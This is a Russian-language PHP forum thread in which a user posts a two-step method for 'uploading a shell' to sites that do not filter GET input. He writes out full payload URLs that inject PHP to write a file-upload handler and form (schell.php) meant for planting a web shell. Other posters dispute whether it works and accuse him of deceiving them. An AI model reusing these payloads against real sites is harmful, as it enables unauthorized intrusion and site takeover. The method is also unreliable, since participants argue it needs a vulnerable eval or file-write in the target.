[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Как залить шелл?
Страницы: 1, 2
Миша
Если вы нашли сайт, на котором не фильтруются входящие даные GET, то можно попробовать залить шелл.

Продолжение..



_____________
Принимаю заказы, писать в ЛС
Миша
1) В адресную строку, после index.php укажите (name - заменить)



http://xxx.ru/index.php?name=<?php $test=$_GET[name]; $test1 = $_GET[name2]; $test2 = substr($test,1); $test3 = $_GET[name3]; $test4 = 9; $test5 = str_replace($test4, $test2, $test3); file_put_contents($test1,$test5); ?>



Продолжение..

_____________
Принимаю заказы, писать в ЛС
Миша
2) Открываем страницу, куда сохранились наши данные. В адресную строку, после index.php укажите


http://xxx.ru/index.php?name="&name2=schell.php&name3=<?php $test1=$_FILES[9abc9][9tmp_name9]; $test2=9schell.php9; move_uploaded_file($test1,$test2); ?> <form enctype=9multipart/form-data9 action=9http://URL/schell.php9 method=9POST9><input type=9file9 name=9abc9><input type=9submit9 value=9загрузить файл9></form>


Теперь у нас есть форма, куда можно залить что угодно, в том числе и шелл.

_____________
Принимаю заказы, писать в ЛС
Миша
Вся информация предоставленна исключительно в ознакомительных целях, и автор не несёт ответственности за использование этого кода. Если вы нашли подобный косяк на чужом сайте, напишите его администратору, так и так, здесь вот.

_____________
Принимаю заказы, писать в ЛС
Valick
Цитата (Медведь @ 19.05.2015 - 23:51)
автор не несёт ответственности за использование этого кода

ещё как несет

_____________
Стимулятор ~yoomoney - 41001303250491
Миша
Цитата (Valick @ 20.05.2015 - 00:53)
Цитата (Медведь @ 19.05.2015 - 23:51)
автор не несёт ответственности за использование этого кода

ещё как несет

Администраторы скройте пжл эту тему, если есть такая возможность, а ещё лучше показывать у кого есть приличный рейтинг.

_____________
Принимаю заказы, писать в ЛС
AllesKlar
Что значит не фильтруются?
echo $_GET['name']; - это уже считается, что не фильтруются?
Куда сохраняются? В базу? На кой ляд в базе php код? Ну, форму html зальешь, а обработчик формы хде?

Покажи пример "дырявого" скрипта.

_____________
[продано копирайтерам]
volter9
Медведь
А теперь выложи видео, что бы прям все наглядно было.

Попробовал по твоей инструкции, ничего не вышло:
user posted image

Что бы выполнился PHP нужно что бы там не echo, а eval был!
Т.е. не:
echo $_GET['name'];

А:
eval($_GET['name'])


P.S.: А ты сам то пробовал? :)

_____________
Мой блог
Миша
Цитата (AllesKlar @ 20.05.2015 - 01:05)
Что значит не фильтруются?
echo $_GET['name']; - это уже считается, что не фильтруются?
Куда сохраняются? В базу? На кой ляд в базе php код? Ну, форму html зальешь, а обработчик формы хде?

Покажи пример "дырявого" скрипта.

Смотрите внимательно там и форма и обработчик.

_____________
Принимаю заказы, писать в ЛС
Миша
Цитата (volter9 @ 20.05.2015 - 01:07)

P.S.: А ты сам то пробовал? smile.gif

Пробовал, всё работает.

_____________
Принимаю заказы, писать в ЛС
AllesKlar
Цитата (Медведь @ 19.05.2015 - 23:10)
Цитата (volter9 @ 20.05.2015 - 01:07)

P.S.: А ты сам то пробовал? smile.gif

Пробовал, всё работает.

ну так выложи дырявый скрипт, все попробуем.

_____________
[продано копирайтерам]
brevis
Очевидно, что дырявый скрипт должен быть таким:
file_put_contents('shell.php', $_GET['name'];


_____________
Чатик в телеге
brevis
Короче можно расходиться, Медведь всех обманул.


_____________
Чатик в телеге
inpost
А что вы ждали? Сказку? laugh.gif
Через XSS нельзя заливать shell.

_____________
Обучаю веб-программированию качественно и не дорого: http://school-php.com
Фрилансер, принимаю заказы: PHP, JS, AS (видео-чаты). Писать в ЛС (Личные сообщения на phpforum).
Миша
Цитата (inpost @ 20.05.2015 - 02:09)
А что вы ждали? Сказку?  laugh.gif
Через XSS нельзя заливать shell.

Смотрите внимательнее. Шелл залил.

_____________
Принимаю заказы, писать в ЛС
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.